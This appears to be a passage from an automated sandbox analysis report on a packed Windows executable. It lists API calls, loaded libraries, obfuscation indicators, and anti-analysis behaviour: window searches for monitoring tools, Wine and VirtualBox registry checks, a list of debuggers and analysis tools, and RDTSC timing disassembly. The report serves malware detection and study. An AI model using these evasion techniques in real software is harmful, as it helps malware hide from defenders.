Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C0255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_00C0255D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_00C029FF
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: xXe4fTmV2h.exeVirustotal: Detection: 40%
Source: xXe4fTmV2h.exeReversingLabs: Detection: 52%
Source: xXe4fTmV2h.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: xXe4fTmV2h.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeSection loaded: kernel.appcore.dllJump to behavior
Source: xXe4fTmV2h.exeStatic file information: File size 4450816 > 1048576
Source: xXe4fTmV2h.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: xXe4fTmV2h.exeStatic PE information: Raw size of mizvqalk is bigger than: 0x100000 < 0x1b2400

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeUnpacked PE file: 5.2.xXe4fTmV2h.exe.c00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mizvqalk:EW;acywuead:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mizvqalk:EW;acywuead:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: xXe4fTmV2h.exeStatic PE information: real checksum: 0x441c97 should be: 0x448e8d
Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: xXe4fTmV2h.exeStatic PE information: section name: .idata
Source: xXe4fTmV2h.exeStatic PE information: section name:
Source: xXe4fTmV2h.exeStatic PE information: section name: mizvqalk
Source: xXe4fTmV2h.exeStatic PE information: section name: acywuead
Source: xXe4fTmV2h.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01ABF5B0 push eax; retf 5_3_01ABF5B1
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01ABB9F0 pushad ; retf 5_3_01ABB9F9
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AAC708 push ss; iretd 5_3_01AAC709
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AAE81C pushad ; iretd 5_3_01AAE81D
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01AB6462 push eax; ret 5_3_01AB6461
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00F841D0 push eax; mov dword ptr [esp], edx5_2_00F841D5
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C82340 push eax; mov dword ptr [esp], 00000000h5_2_00C82343
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00CBC7F0 push eax; mov dword ptr [esp], 00000000h5_2_00CBC743
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C40AC0 push eax; mov dword ptr [esp], 00000000h5_2_00C40AC4
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C61430 push eax; mov dword ptr [esp], 00000000h5_2_00C61433
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C839A0 push eax; mov dword ptr [esp], 00000000h5_2_00C839A3
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_2_00C5DAD0 push eax; mov dword ptr [esp], edx5_2_00C5DAD1
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeCode function: 5_3_01ABA7F0 pushad ; retf 5_3_01ABB7D1
Source: xXe4fTmV2h.exeStatic PE information: section name: mizvqalk entropy: 7.9554844362049995

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: PROCMON.EXE
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: X64DBG.EXE
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WINDBG.EXE
Source: xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: xXe4fTmV2h.exe, 00000005.00000003.1289627107.0000000007680000.00000004.00001000.00020000.00000000.sdmp, xXe4fTmV2h.exe, 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1449D2C second address: 1449D30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1449D30 second address: 1449D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 jc 00007FB0A4FB5B86h 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007FB0A4FB5B86h 0x00000017 popad 0x00000018 jnp 00007FB0A4FB5B8Eh 0x0000001e push edi 0x0000001f pop edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D177 second address: 144D17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D17C second address: 144D1F3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 683BBFCDh 0x0000000f mov di, cx 0x00000012 push 00000003h 0x00000014 add edx, 437130CAh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ebp 0x0000001f call 00007FB0A4FB5B88h 0x00000024 pop ebp 0x00000025 mov dword ptr [esp+04h], ebp 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ebp 0x00000032 push ebp 0x00000033 ret 0x00000034 pop ebp 0x00000035 ret 0x00000036 push 00000003h 0x00000038 jmp 00007FB0A4FB5B97h 0x0000003d mov ecx, dword ptr [ebp+129C2C33h] 0x00000043 call 00007FB0A4FB5B89h 0x00000048 pushad 0x00000049 jne 00007FB0A4FB5B8Ch 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D1F3 second address: 144D250 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FB0A5355D5Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FB0A5355D5Eh 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push eax 0x0000001d jmp 00007FB0A5355D62h 0x00000022 pop eax 0x00000023 pushad 0x00000024 je 00007FB0A5355D56h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D250 second address: 144D263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jo 00007FB0A4FB5B94h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D263 second address: 144D283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB0A5355D56h 0x0000000a popad 0x0000000b pop eax 0x0000000c cmc 0x0000000d lea ebx, dword ptr [ebp+12B2EFDDh] 0x00000013 mov edx, esi 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FB0A5355D58h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D2F4 second address: 144D2F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D465 second address: 144D477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FB0A5355D58h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D477 second address: 144D48B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB0A4FB5B88h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D48B second address: 144D491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D491 second address: 144D4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pop eax 0x00000007 sbb cl, 00000014h 0x0000000a push 00000003h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FB0A4FB5B88h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 pushad 0x00000027 or ebx, 5FD854DDh 0x0000002d jnp 00007FB0A4FB5B8Ch 0x00000033 mov edx, dword ptr [ebp+129C1935h] 0x00000039 popad 0x0000003a push 00000000h 0x0000003c mov edi, dword ptr [ebp+129C2B8Bh] 0x00000042 push 00000003h 0x00000044 jp 00007FB0A4FB5B89h 0x0000004a mov dword ptr [ebp+129C22BAh], ebx 0x00000050 call 00007FB0A4FB5B89h 0x00000055 push eax 0x00000056 push edx 0x00000057 push edi 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D4FB second address: 144D500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D500 second address: 144D515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FB0A4FB5B88h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D515 second address: 144D537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB0A5355D56h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB0A5355D5Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D537 second address: 144D541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB0A4FB5B86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 144D541 second address: 144D5C1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0A5355D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 ja 00007FB0A5355D58h 0x0000001b popad 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 js 00007FB0A5355D64h 0x00000026 pushad 0x00000027 jnc 00007FB0A5355D56h 0x0000002d jp 00007FB0A5355D56h 0x00000033 popad 0x00000034 pop eax 0x00000035 jmp 00007FB0A5355D69h 0x0000003a lea ebx, dword ptr [ebp+12B2EFF1h] 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007FB0A5355D58h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000019h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a or cl, 0000006Ch 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push esi 0x00000062 pop esi 0x00000063 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146E99C second address: 146E9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB0A4FB5B8Ch 0x0000000a jno 00007FB0A4FB5B86h 0x00000010 pop esi 0x00000011 push edi 0x00000012 jo 00007FB0A4FB5B88h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146C99D second address: 146C9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146C9A3 second address: 146C9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB0A4FB5B92h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146CB4E second address: 146CB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146CB59 second address: 146CB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146CFA1 second address: 146CFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB0A5355D56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D10B second address: 146D10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D10F second address: 146D11D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D11D second address: 146D121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D121 second address: 146D139 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0A5355D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FB0A5355D80h 0x00000010 jnc 00007FB0A5355D62h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D139 second address: 146D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D2E1 second address: 146D2FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D66h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D2FB second address: 146D301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D714 second address: 146D744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D68h 0x00000007 jmp 00007FB0A5355D60h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146D744 second address: 146D74E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB0A4FB5B86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146E4B2 second address: 146E4BC instructions: 0x00000000 rdtsc 0x00000002 je 00007FB0A5355D56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 146E4BC second address: 146E4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FB0A4FB5B99h 0x0000000c jmp 00007FB0A4FB5B8Dh 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1473155 second address: 1473159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1473159 second address: 147315E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1473254 second address: 1473267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push edi 0x0000000b je 00007FB0A5355D5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1477CAE second address: 1477CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FB0A4FB5B86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1477CBA second address: 1477CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1477CBE second address: 1477CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1477CC7 second address: 1477CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB0A5355D69h 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1477CEE second address: 1477CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 1477CF4 second address: 1477CF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147A08F second address: 147A0CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB0A4FB5B97h 0x0000000e jg 00007FB0A4FB5B86h 0x00000014 jp 00007FB0A4FB5B86h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jc 00007FB0A4FB5B86h 0x00000023 ja 00007FB0A4FB5B86h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147D53D second address: 147D549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FB0A5355D56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147D949 second address: 147D951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147D951 second address: 147D956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147D956 second address: 147D973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A4FB5B97h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
